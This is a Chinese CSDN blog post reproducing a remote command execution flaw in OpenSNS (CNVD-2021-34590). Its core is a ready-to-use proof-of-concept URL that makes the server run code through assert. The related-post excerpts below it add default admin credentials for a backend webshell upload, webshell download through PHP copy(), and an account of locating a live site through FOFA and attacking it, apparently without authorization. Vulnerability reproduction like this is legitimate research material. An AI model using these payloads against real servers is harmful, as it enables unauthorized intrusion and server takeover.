opensns 命令执行 (CNVD-2021-34590)漏洞复现

已于 2024-04-03 09:45:57 修改
阅读量1.3k 收藏
点赞数
文章标签: 安全 java web安全
于 2022-09-23 09:43:27 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42675091/article/details/127004683
版权

1.漏洞描述

        OpenSNS是想天科技开发的一款综合性社交软件。 OpenSNS存在命令执行漏洞,攻击者可利用该漏洞获取服务器控制权限。

2.打开页面

178f2378787e4ad29f574f73de6390f3.png

 3.构造poc

/index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule->_validationFieldItem%26id[4]=function%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=phpinfo()

686d6f6c5f174debb78e14f486a784ea.png

 

weixin_42675091
关注
漏洞复现 || OpenSNS远程命令执行漏洞
失心少年
07-12 733
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得危害网络安全,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。本文所提供的工具仅用于学习,禁止用于其他!opensns是基于tp3开发的,仅支持php5,漏洞入口在 weibo/share/sharebox,通过 get请求提交query参数,存在变量覆盖的漏洞,攻击者通过漏洞发送特定的请求包可以执行任意命令。1.执行如下POC可执行远程命令
OpenSNS 文件上传getshell
Jiajiajiang_的博客
08-06 1044
当前版本为OpenSNS V5 首先需要登录到后台,默认密码为admin/123456 可以进行尝试 进来后台后,找到上传主题压缩包的地方,也可以直接访问 http://xx.xxx.com/index.php?s=/admin/theme/add.html 在这之前准备一个一句话,当然大马也可以,将你的一句话压缩成一个压缩包。 如图所示,记住压缩前马的名字。 点击上传主题压...
Opensns 命令执行漏洞CNVD-2021-34590)
小小猪的博客
12-29 3674
Opensns 命令执行漏洞CNVD-2021-34590) 漏洞描述: OpenSNS 存在远程命令执行漏洞,攻击者通过漏洞发送特定的请求包可以执行任意命令 影响版本: OpenSNS v5 环境搭建: 在线环境 地址 访问首页 构造poc /index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[m.
opensns v6.2.0前台RCE漏洞分析
weixin_40484719的博客
10-16 3013
最近准备进一步学习下代码审计,因此打算找些历史漏洞分析学习下。(啥时候我也能挖出前台rce呢 本次漏洞的入口点在于 Application/Weibo/Controller/ShareController.class.php的shareBox方法。 Application/Weibo/Controller/ShareController.class.php share控制器获取外部输入$query,并将它用parse_str解析后交给$array,这里其实就相当于传入了一个数组。接下...
opensns综合性社交软件系统存在远程命令执行高危漏洞
weixin_68647219的博客
08-01 3526
opensns综合性社交软件系统远程命令执行高危漏洞,该漏洞是由于漏洞入口在 weibo/share/sharebox通过 get请求提交query参数存在变量覆盖,可能导致攻击者通过漏洞发送特定的请求包执行任意命令
OpenSNS 远程执行任意命令漏洞
未花的博客
12-01 411
status必须等于1,值里必须要app、model、method
红帽杯2021 决赛 opensns 复现
feng的博客
08-05 715
前言 因为某些事情,没有参加今年的红帽杯决赛,所以来复现一下决赛的Web题里面的opensns,学习一下思路。 复现 根据网上的文章进行复现学习。感觉能找到这个洞的师傅实在tql。 漏洞点位于Application/Weibo/Controller/ShareController.class.php的shareBox方法: public function shareBox(){ $query = urldecode(I('get.query','','text'));
OpenSNS开源社交系统 v5.7.0
10-14
OpenSNS一款有身份的开源SNS社交系统,包含 微博、资讯、活动、论坛、专辑、积分商城、群组、充值中心、 问答、分类信息、微店等模块,支持PC端、手机网页版、客户端、 微信版
OpenSNS-a5
11-08
不过,由于源码开放,用户和开发者需要注意及时更新到最新版本,以修复可能存在的安全漏洞。 总的来说,OpenSNS"a5"版本是一个强大的社交网络建设工具,它不仅提供了丰富的社交功能,还允许用户根据自身需求进行...
OpenSNS-2.6.0安装教程及完整PHP源码下载.txt
07-17
OpenSNS是php语言的开源社交源码系统,用户交互界面简洁大方,包含功能有微博、论坛、积分商城、群组、充值中心、分类信息、微店等,可以快速搭建社交类网址。
2024HVV在即| 最新漏洞CVE库(1.5W)与历史漏洞POC总结分享!
最新发布
记录开发和安全学习过程中的点点滴滴
04-22 1827
也快到护网的时间了,每年的护网都是一场攻防实战的盛宴,那么漏洞库就是攻防红蓝双方人员的弹药库,红队人员可以通过工具进行监测是否存在历史漏洞方便快速打点,而蓝队则可以对资产进行梳理和监测历史漏洞,及时处理和修复,做好准备.
OpenSNS开源社交系统--文件上传渗透测试复现
CNXBDSa的博客
08-19 1659
前提:在先知社区里面偶然看见了这个漏洞,咱也想试试,就下载了开源的码进行了本地的复现 源码信息:OpenSNS开源版 漏洞类型:后台getshell 下载地址:http://www.opensns.cn/home/index/download.html 漏洞文件:./Application/Admin/Controller/ThemeController.class.php 第170行 可参考这下载安装使用https://www.w3cschool.cn/opensnscourse/laxp1pnw.htm
一次渗透测试......OpenSNS漏洞
giaogiao123的博客
08-09 1467
fofa上直接找,找到某倒霉的站。 直接搜索OpenSNSv 6.2 首先开始试一试前台rce index.php?s=weibo/share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[method]=-%3E_validationFieldItem%26id[status]=1%26id[4]=function%26id[1]=assert%26id[args]=jiang=phpinfo()%26id
openSNS(V2版本) 用户身份切换可能产生的bug以及正规流程
F_shan的博客
07-29 953
openSNS V2版本注册用户的身份切换有一个严格的流程,不是通过这个流程切换用户身份会造成登入和提示身份未审核或禁用提示,影响体验。在此我会给出身份切换的流程:
opensns html5,记对OpenSNS的一次代码审计
weixin_29289821的博客
06-28 303
*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。我在FreeBuf上每天都可以学到很多新思路新技术,感谢这个平台,为了回馈FreeBuf的小伙伴们,写下这篇文章,希望在可以为奋斗在网络安全路上的小伙伴们提供一些新奇小思路,其实挖洞并不难,也希望大家能把分享的精神发扬光大。概述OpenSNS是想天科技开发的一款综合性社交软件。您可以...
OpenSNS后台文件上传漏铜分析
weixin_30369087的博客
07-06 311
前言   这几天正在想找个文件上传漏洞分析一波,以加深对文件上传漏洞的理解,正好看到FreeBuf的一片文章记对OpenSNS的一次代码审计,由于其只对漏洞进行复现,故在此进行代码层面的分析。 漏洞分析   已知漏洞产生点:./Application/Admin/Controller/ThemeController.class.php 第170行      跟入upload函数(...
vulfocus——opensns命令执行(CNVD-2021-34590
m0_62063669的博客
09-29 704
此处的cmd= 只能传参1个,在使用'system'函数空格会导致执行失败,故而使用php中的copy函数直接下载webshell实现RCE。OpenSNS存在命令执行漏洞,攻击者可利用该漏洞获取服务器控制权限。copy(远程文件下载地址,需要下载到的地方)4.也可以通过下载webshell,用工具连接。2.发送特定请求包可以执行任意命令。3.在phpinfo找到flag。
openssl漏洞怎么处理_针对CBC字节反转攻击的研究与漏洞复现
weixin_39546747的博客
11-27 228
作者:Qftm合天智汇CBC 简介现代密码体制现代密码中的加密体制一般分为对称加密体制(Symmetric Key Encryption)和非对称加密体制(Asymmetric Key Encryption)。对称加密又分为分组加密和序列密码。分组密码分组密码:也叫块加密(block cyphers),一次加密明文中的一个块。是将明文按一定的位长分组,明文组经过加密运算得到密文组,密文组经过解密运...
解析OpenSSL重大安全漏洞
风叶
04-30 3747
2014年4月8日,XP宣布正式停止服务的日子,也是OpenSSL爆出大漏洞的日子。这个漏洞影响30~50%比例使用https的网站,其中包括大家经常访问的:支付宝、微信、淘宝、网银、社交、门户等知名网站。只要访问https的网站便有可能存在被嗅探数据的风险。   OpenSSL是什么?   OpenSSL是目前移动互联网上应用最广泛的安全传输方法(基于SSL即安全套接层协议)。它为网络通信提
OpenSNS与畅言第三方评论整合教程
"这篇使用说明主要介绍了如何将OpenSNS系统与第三方评论系统畅言进行完美整合,实现单点登录功能。" 在IT行业中,尤其是社交媒体平台或内容管理系统开发中,集成第三方评论系统是一个常见的需求,以提升用户体验并...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值